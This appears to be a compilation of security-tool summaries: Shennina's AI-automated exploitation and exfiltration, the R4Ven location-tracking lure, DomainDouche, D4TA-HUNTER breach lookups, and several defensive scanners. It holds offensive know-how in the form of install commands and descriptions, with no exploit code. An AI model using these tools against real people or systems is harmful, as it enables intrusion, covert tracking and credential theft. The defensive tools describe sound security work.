  • The generated payloads can run even by users with limited privileges.

Contributions

Pull requests are generally welcome. Please keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests, either because I have a plan for the course of a project or because I judge that the foreign code would be hard to test and/or maintain. It doesn't have to do with how good or bad an idea is; it's just too much work, and I am also developing all these tools partly to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.



Shennina - Automating Host Exploitation With AI


Shennina is an automated host exploitation framework. The mission of the project is to fully automate the scanning, vulnerability scanning/analysis, and exploitation using Artificial Intelligence. Shennina is integrated with Metasploit and Nmap for performing the attacks, as well as being integrated with an in-house Command-and-Control Server for exfiltrating data from compromised machines automatically.

This was developed by Mazin Ahmed and Khalid Farah within the HITB CyberWeek 2019 AI challenge. The project is developed based on the concept of DeepExploit by Isao Takaesu.

Shennina scans a set of input targets for available network services, uses its AI engine to identify recommended exploits for the attacks, and then attempts to test and attack the targets. If the attack succeeds, Shennina proceeds with the post-exploitation phase.

The AI engine is initially trained against live targets to learn reliable exploits against remote services.

Shennina also supports a "Heuristics" mode for identifying recommended exploits.

The documentation can be found in the Docs directory within the project.


Features

  • Automated self-learning approach for finding exploits.
  • High performance using managed concurrency design.
  • Intelligent exploits clustering.
  • Post exploitation capabilities.
  • Deception detection.
  • Ransomware simulation capabilities.
  • Automated data exfiltration.
  • Vulnerability scanning mode.
  • Heuristic mode support for recommending exploits.
  • Windows, Linux, and macOS support for agents.
  • Scriptable attack method within the post-exploitation phase.
  • Exploits suggestions for Kernel exploits.
  • Out-of-Band technique testing for exploitation checks.
  • Automated exfiltration of important data on compromised servers.
  • Reporting capabilities.
  • Coverage for 40+ TTPs within the MITRE ATT&CK Framework.
  • Supports multi-input targets.

Why are we solving this problem with AI?

The problem should be solved by a hash tree without using "AI", however, the HITB Cyber Week AI Challenge required the project to find ways to solve it through AI.

Note

This project is a security experiment.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of Shennina for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Authors



Legitify - Detect And Remediate Misconfigurations And Security Risks Across All Your GitHub Assets


Strengthen the security posture of your GitHub organization!
Detect and remediate misconfigurations, security and compliance issues across all your GitHub assets with ease


Installation

  1. You can download the latest legitify release from https://github.com/Legit-Labs/legitify/releases; each archive contains:
  • Legitify binary for the desired platform
  • Built-in policies provided by Legit Security
  2. Or build from source with the following steps:
git clone git@github.com:Legit-Labs/legitify.git
go run main.go analyze ...

Provenance

To enhance the software supply chain security of legitify's users, as of v0.1.6, every legitify release contains a SLSA Level 3 Provenance document.
The provenance document refers to all artifacts in the release, as well as the generated docker image.
You can use SLSA framework's official verifier to verify the provenance.
Example of usage for the darwin_arm64 architecture for the v0.1.6 release:

VERSION=0.1.6
ARCH=darwin_arm64
./slsa-verifier verify-artifact --source-branch main --builder-id 'https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.2.2' --source-uri "git+https://github.com/Legit-Labs/legitify" --provenance-path multiple.intoto.jsonl ./legitify_${VERSION}_${ARCH}.tar.gz

Requirements

  1. To get the most out of legitify, you need to be an owner of at least one GitHub organization. Otherwise, you can still use the tool if you're an admin of at least one repository inside an organization, in which case you'll be able to see only repository-related policies results.
  2. legitify requires a GitHub personal access token (PAT) to analyze your resources successfully, which can be either provided as an argument (-t) or as an environment variable ($GITHUB_ENV). The PAT needs the following scopes for full analysis:
admin:org, read:enterprise, admin:org_hook, read:org, repo, read:repo_hook

See Creating a Personal Access Token for more information.
Fine-grained personal access tokens are currently not supported because they do not support GitHub's GraphQL (https://github.blog/2022-10-18-introducing-fine-grained-personal-access-tokens-for-github/)

Usage

LEGITIFY_TOKEN=<your_token> legitify analyze

By default, legitify will check the policies against all your resources (organizations, repositories, members, actions).

You can control which resources will be analyzed with the command-line flags --namespace and --org:

  • --namespace (-n): will analyze policies that relate to the specified resources
  • --org: will limit the analysis to the specified organizations
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member

The above command will test organization and member policies against org1 and org2.

GitHub Enterprise Support

You can run legitify against a GitHub Enterprise instance if you set the endpoint URL in the environment variable SERVER_URL:

export SERVER_URL="https://github.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member

GitLab Cloud/Server Support

To run legitify against GitLab Cloud, set the scm flag to gitlab (--scm gitlab); to run against GitLab Server, you also need to provide SERVER_URL:

export SERVER_URL="https://gitlab.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --namespace organization --scm gitlab

Namespaces

Namespaces in legitify are resources that are collected and run against the policies. Currently, the following namespaces are supported:

  1. organization - organization level policies (e.g., "Two-Factor Authentication Is Not Enforced for the Organization")
  2. actions - organization GitHub Actions policies (e.g., "GitHub Actions Runs Are Not Limited To Verified Actions")
  3. member - organization members policies (e.g., "Stale Admin Found")
  4. repository - repository level policies (e.g., "Code Review By At Least Two Reviewers Is Not Enforced")
  5. runner_group - runner group policies (e.g., "runner can be used by public repositories")

By default, legitify will analyze all namespaces. You can limit the analysis to selected ones with the --namespace flag, followed by a comma-separated list of the selected namespaces.

Output Options

By default, legitify will output the results in a human-readable format. This includes the list of policy violations listed by severity, as well as a summary table that is sorted by namespace.

Output Formats

Using the --output-format (-f) flag, legitify supports outputting the results in the following formats:

  1. human-readable - Human-readable text (default).
  2. json - Standard JSON.

Output Schemes

Using the --output-scheme flag, legitify supports outputting the results in different grouping schemes. Note: --output-format=json must be specified to output non-default schemes.

  1. flattened - No grouping; A flat listing of the policies, each with its violations (default).
  2. group-by-namespace - Group the policies by their namespace.
  3. group-by-resource - Group the policies by their resource, e.g., a specific organization/repository.
  4. group-by-severity - Group the policies by their severity.

Output Destinations

  • --output-file - full path of the output file (default: no output file, prints to stdout).
  • --error-file - full path of the error logs (default: ./error.log).

Coloring

When outputting in a human-readable format, legitify supports the conventional --color[=when] flag, which has the following options:

  • auto - colored output if stdout is a terminal, uncolored otherwise (default).
  • always - colored output regardless of the output destination.
  • none - uncolored output regardless of the output destination.

Misc

  • Use the --failed-only flag to filter out passed/skipped checks from the result.

Scorecard Support

scorecard is an OSSF open-source project:

Scorecards is an automated tool that assesses a number of important heuristics ("checks") associated with software security and assigns each check a score of 0-10. You can use these scores to understand specific areas to improve in order to strengthen the security posture of your project. You can also assess the risks that dependencies introduce, and make informed decisions about accepting these risks, evaluating alternative solutions, or working with the maintainers to make improvements.

legitify supports running scorecard for all of the organization's repositories, enforcing score policies and showing the results using the --scorecard flag:

  • no - do not run scorecard (default).
  • yes - run scorecard and employ a policy that alerts on each repo score below 7.0.
  • verbose - run scorecard, employ a policy that alerts on each repo score below 7.0, and embed its output to legitify's output.

legitify runs the following scorecard checks:

Check                    Public Repository  Private Repository
Security-Policy          V
CII-Best-Practices       V
Fuzzing                  V
License                  V
Signed-Releases          V
Branch-Protection        V                  V
Code-Review              V                  V
Contributors             V                  V
Dangerous-Workflow       V                  V
Dependency-Update-Tool   V                  V
Maintained               V                  V
Pinned-Dependencies      V                  V
SAST                     V                  V
Token-Permissions        V                  V
Vulnerabilities          V                  V
Webhooks                 V                  V

Policies

legitify comes with a set of policies in the policies/github directory. These policies are documented here.

In addition, you can use the --policies-path (-p) flag to specify a custom directory for OPA policies.

Contribution

Thank you for considering contributing to Legitify! We encourage and appreciate any kind of contribution. Here are some resources to help you get started:



R4Ven - Track Ip And GPS Location

Track a user's smartphone/PC IP and GPS location.

The tool hosts a fake website which uses an iframe to display a legit website and, if the target allows it, it will fetch the GPS location (latitude and longitude) of the target along with the IP address and device information.

This tool is a Proof of Concept and is for Educational Purposes Only.

Using this tool, you can find out what information a malicious website can gather about you and your devices and why you shouldn't click on random links or grant permissions like Location to them.


On link click

+ It will automatically fetch the IP address and device information
! If location permission is allowed, it will fetch the exact location of the target.

Limitation

- It will not work on laptops or phones that have broken GPS, 
# browsers that block javascript,
# or if the user is mocking the GPS location.

IP location vs GPS location

- Geographic location based on IP address is NOT accurate;
# it does not provide the location of the target.
# Instead, it provides the approximate location of the ISP (Internet Service Provider).

+ GPS fetches an almost exact location because it uses longitude and latitude coordinates.
@@ Once location permission is granted @@
# accurate location information is received, to within 20 to 30 meters of the user's location
# (it's almost the exact location)

Installation

git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py

Enter your Discord webhook URL (set up a channel in your Discord server with webhook integration).

https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

If you don't have a Discord account and server, make one; it's free.

https://discord.com/


Tracked info will be sent to your Discord webhook channel.
  • Why a Discord webhook? Conveniently, you will receive a notification when someone clicks on the link (a minimal sketch of such a webhook notification follows below).
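
Here is a minimal sketch of what such a webhook notification looks like; Discord webhooks accept a simple JSON POST (the URL and data below are hypothetical):

import requests

webhook_url = "https://discord.com/api/webhooks/<id>/<token>"  # hypothetical
payload = {"content": "New visitor: IP 203.0.113.7, lat/long 48.85/2.35"}
requests.post(webhook_url, json=payload, timeout=10)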

To change the website template

  • Open the file index.html, go to line 12, and replace the src in the iframe. (Note: not every website supports iframes.)


To port forward, install ngrok or use SSH

  • For ngrok port forward type: ngrok http 8000
  • For ssh port forwarding type: ssh -R 80:localhost:8000 ssh.localhost.run

Snapshots



DomainDouche - OSINT Tool to Abuse SecurityTrails Domain Suggestion API To Find Potentially Related Domains By Keyword And Brute Force


Abusing SecurityTrails domain suggestion API to find potentially related domains by keyword and brute force.

Use it while it still works


(Also, hmu on Mastodon: @n0kovo@infosec.exchange)


Usage:

usage: domaindouche.py [-h] [-n N] -c COOKIE -a USER_AGENT [-w NUM] [-o OUTFILE] keyword

Abuses SecurityTrails API to find related domains by keyword.
Go to https://securitytrails.com/dns-trails, solve any CAPTCHA you might encounter,
copy the raw value of your Cookie and User-Agent headers and use them with the -c and -a arguments.

positional arguments:
  keyword               keyword to append brute force string to

options:
  -h, --help            show this help message and exit
  -n N, --num N         number of characters to brute force (default: 2)
  -c COOKIE, --cookie COOKIE
                        raw cookie string
  -a USER_AGENT, --useragent USER_AGENT
                        user-agent string (must match the browser where the cookies are from)
  -w NUM, --workers NUM
                        number of workers (default: 5)
  -o OUTFILE, --output OUTFILE
                        output file path


D4TA-HUNTER - GUI Osint Framework With Kali Linux


D4TA-HUNTER is a tool created in order to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.

In addition, in the "search company" section of this tool you can insert the domain of a company to find emails of employees, subdomains, and IPs of servers.


GET API KEY

Register on https://rapidapi.com/rohan-patra/api/breachdirectory

Install

git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh

After executing the application launcher, you need to have all the components installed; the launcher will check them one by one, and if any component is not installed it will show you the command that you must enter to install it:



Use

First you must have a free or paid API key from BreachDirectory.org; if you don't have one and do a search, D4TA-HUNTER provides you with a guide on how to get one.

Once you have the API key you will be able to search for emails, with the advantage of seeing a list of all the password hashes ready for you to copy and paste into one of the online resources provided by D4TA-HUNTER to crack passwords, 100% free.


Β 

You can also insert the domain of a company, and D4TA-HUNTER will search for employee emails, as well as subdomains that may be of interest, together with the IPs of machines found:


Β 

Apis and tools

Service              Functions                      Status
BreachDirectory.org  Email, phone or nick leaks     βœ… (free plan)
TheHarvester         Domains and emails of company  βœ… Free
Kalitorify           Tor search                     βœ… Free


Video Demo: https://darkhacking.es/d4ta-hunter-framework-osint-para-kali-linux
My website: https://microjoan.com
My blog: https://darkhacking.es/
Buy me a coffee: https://www.buymeacoffee.com/microjoan

DISCLAIMER

This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing this in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!




Appshark - Static Taint Analysis Platform To Scan Vulnerabilities In An Android App


Appshark is a static taint analysis platform to scan vulnerabilities in an Android app.

Prerequisites

Appshark requires a specific version of JDK -- JDK 11. After testing, it does not work on other LTS versions, JDK 8 and JDK 16, due to dependency compatibility issues.


Building/Compiling AppShark

We assume that you are working in the root directory of the project repo. You can build the whole project with the gradle tool.

$ ./gradlew build  -x test 

After executing the above command, you will see an artifact file AppShark-0.1.1-all.jar in the directory build/libs.

Running AppShark

Like the previous step, we assume that you are still in the root folder of the project. You can run the tool with

$ java -jar build/libs/AppShark-0.1.1-all.jar  config/config.json5

The config.json5 has the following configuration contents.

{
  "apkPath": "/Users/apks/app1.apk",
  "out": "out",
  "rules": "unZipSlip.json",
  "maxPointerAnalyzeTime": 600
}

Each JSON field is explained below.

  • apkPath: the path of the apk file to analyze
  • out: the path of the output directory
  • rules: the path(s) of the rule file(s); more than one rule file can be specified
  • maxPointerAnalyzeTime: the timeout duration in seconds set for the analysis started from an entry point
  • debugRule: specify the rule name that enables logging for debugging

If you provide a configuration JSON file which sets the output path as out in the project root directory, you will find the result file out/results.json after running the analysis.

Interpreting the Results

Below is an example of the results.json.

{
  "AppInfo": {
    "AppName": "test",
    "PackageName": "net.bytedance.security.app",
    "min_sdk": 17,
    "target_sdk": 28,
    "versionCode": 1000,
    "versionName": "1.0.0"
  },
  "SecurityInfo": {
    "FileRisk": {
      "unZipSlip": {
        "category": "FileRisk",
        "detail": "",
        "model": "2",
        "name": "unZipSlip",
        "possibility": "4",
        "vulners": [
          {
            "details": {
              "position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>",
              "Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31",
              "entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
              "Source": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
              "url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/1-unZipSlip.html",
              "target": [
                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
                "pf{obj{<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>:35=>java.lang.StringBuilder}(unknown)->@data}",
                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r11",
                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31"
              ]
            },
            "hash": "ec57a2a3190677ffe78a0c8aaf58ba5aee4d2247",
            "possibility": "4"
          },
          {
            "details": {
              "position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>",
              "Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34",
              "entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
              "Source": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
              "url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/2-unZipSlip.html",
              "target": [
                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
                "pf{obj{<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>:33=>java.lang.StringBuilder}(unknown)->@data}",
                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r14",
                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34"
              ]
            },
            "hash": "26c6d6ee704c59949cfef78350a1d9aef04c29ad",
            "possibility": "4"
          }
        ],
        "wiki": "",
        "deobfApk": "/Volumes/dev/zijie/appshark-opensource/app.apk"
      }
    }
  },
  "DeepLinkInfo": {},
  "HTTP_API": [],
  "JsBridgeInfo": [],
  "BasicInfo": {
    "ComponentsInfo": {},
    "JSNativeInterface": []
  },
  "UsePermissions": [],
  "DefinePermissions": {},
  "Profile": "/Volumes/dev/zijie/appshark-opensource/out/vuln/3-profiler.json"
}


Bomber - Scans Software Bill Of Materials (SBOMs) For Security Vulnerabilities


bomber is an application that scans SBOMs for security vulnerabilities.

Overview

So you've asked a vendor for a Software Bill of Materials (SBOM) for one of their closed source products, and they provided one to you in a JSON file... now what?

The first thing you're going to want to do is see if any of the components listed inside the SBOM have security vulnerabilities, and what kind of licenses these components have. This will help you identify what kind of risk you will be taking on by using the product. Finding security vulnerabilities and license information for components identified in an SBOM is exactly what bomber is meant to do. bomber can read any JSON or XML based CycloneDX format, or a JSON SPDX or Syft formatted SBOM, and tell you pretty quickly if there are any vulnerabilities.


What SBOM formats are supported?

There are quite a few SBOM formats available today. bomber supports the following:

Providers

bomber supports multiple sources for vulnerability information. We call these providers. Currently, bomber uses OSV as the default provider, but you can also use the Sonatype OSS Index.

Please note that each provider supports different ecosystems, so if you're not seeing any vulnerabilities in one, try another. It is also important to understand that each provider may report different vulnerabilities. If in doubt, look at a few of them.

If bomber does not find any vulnerabilities, it doesn't mean that there aren't any. All it means is that the provider being used didn't detect any, or it doesn't support the ecosystem. Some providers have vulnerabilities that come back with no Severity information. In this case, the Severity will be listed as "UNDEFINED"

What is an ecosystem?

An ecosystem is simply the package manager, or type of package. Examples include rpm, npm, gems, etc. Each provider supports different ecosystems.

OSV

OSV is the default provider for bomber. It is an open, precise, and distributed approach to producing and consuming vulnerability information for open source.

You don't need to register for any service, get a password, or a token. Just use bomber without a provider flag and away you go like this:

bomber scan test.cyclonedx.json

Supported ecosystems

At this time, OSV supports the following ecosystems:

  • Android
  • crates.io
  • Debian
  • Go
  • Maven
  • NPM
  • NuGet
  • Packagist
  • PyPI
  • RubyGems

and others...

OSV Notes

The OSV provider is pretty slow right now when processing large SBOMs. At the time of this writing, their batch endpoint is not functioning, so bomber needs to call their API one package at a time.

Additionally, there are cases where OSV does not return a Severity, or a CVE/CWE. In these rare cases, bomber will output "UNSPECIFIED", and "UNDEFINED" respectively.
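
Since the batch endpoint was not working, each package is looked up individually; here is a minimal Python sketch of what a single-package OSV query looks like (the PURL is a hypothetical example):

import requests

purl = "pkg:npm/lodash@4.17.20"  # hypothetical package URL
resp = requests.post("https://api.osv.dev/v1/query",
                     json={"package": {"purl": purl}}, timeout=30)
vulns = resp.json().get("vulns", [])
print(f"{purl}: {len(vulns)} known vulnerabilities")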

Sonatype OSS Index

In order to use bomber with the Sonatype OSS Index you need to get an account. Head over to the site, create a free account, and make note of your username (this will be the email that you registered with).

Once you log in, you'll want to navigate to your settings and make note of your API token. Please don't share your token with anyone.

Supported ecosystems

At this time, the Sonatype OSS Index supports the following ecosystems:

  • Maven
  • NPM
  • Go
  • PyPi
  • Nuget
  • RubyGems
  • Cargo
  • CocoaPods
  • Composer
  • Conan
  • Conda
  • CRAN
  • RPM
  • Swift

Installation

Mac

You can use Homebrew to install bomber using the following:

brew tap devops-kung-fu/homebrew-tap
brew install devops-kung-fu/homebrew-tap/bomber

If you do not have Homebrew, you can still download the latest release (ex: bomber_0.1.0_darwin_all.tar.gz), extract the files from the archive, and use the bomber binary.

If you wish, you can move the bomber binary to your /usr/local/bin directory or anywhere on your path.

Linux

To install bomber, download the latest release for your platform and install locally. For example, install bomber on Ubuntu:

dpkg -i bomber_0.1.0_linux_arm64.deb

Using bomber

You can scan either an entire folder of SBOMs or an individual SBOM with bomber. bomber doesn't care if you have multiple formats in a single folder. It'll sort everything out for you.

Note that the default output for bomber is to STDOUT. Options to output in HTML or JSON are described later in this document.

Single SBOM scan

# Using OSV (the default provider) which does not require any credentials
bomber scan spdx.sbom.json

# Using a provider that requires credentials (ossindex)
bomber scan --provider=xxx --username=xxx --token=xxx spdx-sbom.json

If the provider finds vulnerabilities you'll see an output similar to the following:

If the provider doesn't return any vulnerabilities you'll see something like the following:

Entire folder scan

This is good for when you receive multiple SBOMs from a vendor for the same product. Or, maybe you want to find out what vulnerabilities you have in your entire organization. A folder scan will find all components, de-duplicate them, and then scan them for vulnerabilities.

# scan a folder of SBOMs (the following command will scan a folder in your current folder named "sboms")
bomber scan --username=xxx --token=xxx ./sboms

You'll see a similar result to what a Single SBOM scan will provide.

Output to HTML

If you would like a readable report generated with detailed vulnerability information, you can use the --output flag to save a report to an HTML file.

Example command:

bomber scan bad-bom.json --output=html

This will save a file in your current folder in the format "YYYY-MM-DD-HH-MM-SS-bomber-results.html". If you open this file in a web browser, you'll see output like the following:

Output to JSON

bomber can output vulnerability data in JSON format using the --output flag. The default output is to STDOUT. There is a ton more information in the JSON output than what gets displayed in the terminal. You'll be able to see a package description and what its purpose is, the vulnerability name, a summary of the vulnerability, and more.

Example command:

bomber scan bad-bom.json --output=json

Advanced stuff

If you wish, you can set two environment variables to store your credentials, and not have to type them on the command line. Check out the Environment Variables information later in this README.

Environment Variables

If you don't want to enter credentials all the time, you can add the following to your .bashrc or .bash_profile

export BOMBER_PROVIDER_USERNAME={{your OSS Index user name}}
export BOMBER_PROVIDER_TOKEN={{your OSS Index API Token}}

Messing around

If you want to kick the tires on bomber you'll find a selection of test SBOMs in the test folder.

Notes

  • It's pretty rare to see SBOMs with license information. Most of the time, the generators like Syft need a flag like --license. If you need license info, make sure you ask for it with the SBOM.
  • Hate to say it, but SPDX is wonky. If you don't get any results on an SPDX file, try using a CycloneDX file. In general you should always try to get CycloneDX SBOMs from your vendors.
  • OSV. It's great, but the API is also wonky. They have a batch endpoint that would make it a ton quicker to get information back, but it doesn't work. bomber needs to send one PURL at a time to get vulnerabilities back, so in a big SBOM it will take some time. We'll keep an eye on that.
  • OSV has another issue where passing the ecosystem doesn't always return vulnerabilities. We had to stop passing it to the API to get anything back. They also don't echo the ecosystem back, so we can't verify that when we pass one ecosystem in, the vulnerabilities we get belong to the same one.

Contributing

If you would like to contribute to the development of bomber please refer to the CONTRIBUTING.md file in this repository. Please read the CODE_OF_CONDUCT.md file before contributing.

Software Bill of Materials

bomber uses Syft to generate a Software Bill of Materials every time a developer commits code to this repository (as long as Hookz is being used and has been initialized in the working directory). More information for CycloneDX is available here.

The current CycloneDX SBOM for bomber is available here.

Credits

A big thank-you to our friends at Smashicons for the bomber logo.

Big kudos to our OSS homies at Sonatype for providing a wicked tool like the Sonatype OSS Index.



Aura - Python Source Code Auditing And Static Analysis On A Large Scale

Source code auditing and static code analysis

Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of the source code and implement secure coding practices with a focus on auditing 3rd party code such as python package dependencies
  • allow researchers to scan code repositories on a large scale, create datasets, and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Feature list:

  • Suitable for analyzing malware, with a guarantee of zero code execution
  • Advanced deobfuscation mechanisms based on rewriting the AST: constant propagation, code unrolling, and other dirty tricks
  • Recursive scanning automatically unpacks archives such as zips, wheels, etc., and scans their contents
  • Supports scanning non-Python files as well: plugins can work in a "raw-file" mode, such as the built-in Yara integration
  • Scan for hardcoded secrets, passwords, and other sensitive information
  • Custom diff engine: compare different data sources, such as diffing a typosquatted PyPI package against the original to see exactly what was changed
  • Works for both Python 2.x and Python 3.x source code
  • High performance, designed to scan the whole PyPI repository
  • Output in numerous formats such as pretty plain text, JSON, SQLite, SARIF, etc…
  • Tested on over 4TB of compressed python source code
  • Aura is able to report on code behavior such as network communication, file access, or system command execution
  • Compute the "Aura score" telling you how trustworthy the source code/input data is
  • and much much more…

Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, from data analyzers and transport protocols to custom output formats.


Installation

# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full

Or just use the prebuilt docker image sourcecodeai/aura:dev

Running Aura

docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses so-called URIs to identify the protocol and location to scan; if no protocol is given, the scan argument is treated as a path to a file or directory on the local system.
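For example (illustrative commands; my_project is a placeholder for any local directory):

aura scan pypi://requests   # fetch and scan the requests package from PyPI
aura scan ./my_project      # no protocol: treated as a local path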

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find most popular typosquatted packages (you need to call aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10

Why Aura?

While there are other tools whose functionality overlaps with Aura, such as Bandit, dlint, and semgrep, the focus of these alternatives is different, which impacts their functionality and how they are used. These alternatives are mainly intended to be used like linters: integrated into IDEs and run frequently during development, which makes it important to minimize false positives and, ideally, to report findings with clear, actionable explanations.

Aura, on the other hand, reports on the behavior of the code, anomalies, and vulnerabilities with as much information as possible, at the cost of false positives. Many of the things reported by Aura are not necessarily actionable by a user, but they tell you a lot about the behavior of the code, such as network communication, access to sensitive files, or the use of mechanisms associated with obfuscation that indicate possibly malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems, such as antivirus, IDS, or firewalls, which essentially do the same analysis on different kinds of data (network communication, running processes, etc.).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to Python (target) source code only, and to the Python version under which the tool is installed.
    • Aura - can analyze binary (or other non-Python) files as well as Python source code, and can analyze a mixture of code compatible with different Python versions (py2k & py3k) using the same Aura installation.
  • reporting:
    • Other SAST tools - aim to integrate well with other systems such as IDEs and CI systems, producing actionable results while trying to minimize false positives so users are not overwhelmed with insignificant alerts.
    • Aura - reports as much information as possible, including findings that are not immediately actionable, such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readability.
  • configuration:
    • Other SAST tools - are fine-tuned to the target project by customizing the signatures for the specific technologies that project uses. Overriding the configuration is often possible by inserting comments into the source code, such as # nosec, which suppress the alert at that position.
    • Aura - expects little to no advance knowledge of the technologies used by the code being scanned, such as when auditing a new Python package for approval as a project dependency. In most cases it is not even possible to modify the scanned source code (for example, by adding comments that tell a linter or Aura to skip a detection), because Aura scans a copy of code hosted at some remote location.

Authors & Contributors

Donate

LICENSE

Aura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:

@misc{Carnogursky2019thesis,
  AUTHOR = "CARNOGURSKY, Martin",
  TITLE = "Attacks on package managers [online]",
  YEAR = "2019 [cit. 2020-11-02]",
  TYPE = "Bachelor Thesis",
  SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
  SUPERVISOR = "Vit Bukac",
  URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}


dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!
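A minimal pipeline step might look like the following (a sketch; domains.txt is a placeholder file listing the domains you intend to provision):

docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/domains.txt --pipeline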

Usage

To run DNS Reaper, you can use the docker image or run it with python 3.10.

Findings are returned in the output, and more detail is provided in a local "results.csv" file. We also support JSON output as an option.
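For example, to write the findings as JSON instead of the default CSV (example.com stands in for your domain):

docker run punksecurity/dnsreaper single --domain example.com --out-format=json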

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

[ PunkSecurity ASCII-art banner ]
PRESENTS
DNS Reaper ☠️

Scan all your DNS records for subdomain takeovers!

usage:
.\main.py provider [options]

output:
findings output to screen and (by default) results.csv

help:
.\main.py --help

providers:
> aws - Scan multiple domains by fetching them from AWS Route53
> azure - Scan multiple domains by fetching them from Azure DNS services
> bind - Read domains from a dns BIND zone file, or path to multiple
> cloudflare - Scan multiple domains by fetching them from Cloudflare
> file - Read domains from a file, one per line
> single - Scan a single domain by providing a domain on the commandline
> zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
{aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
-h, --help Show this help message and exit
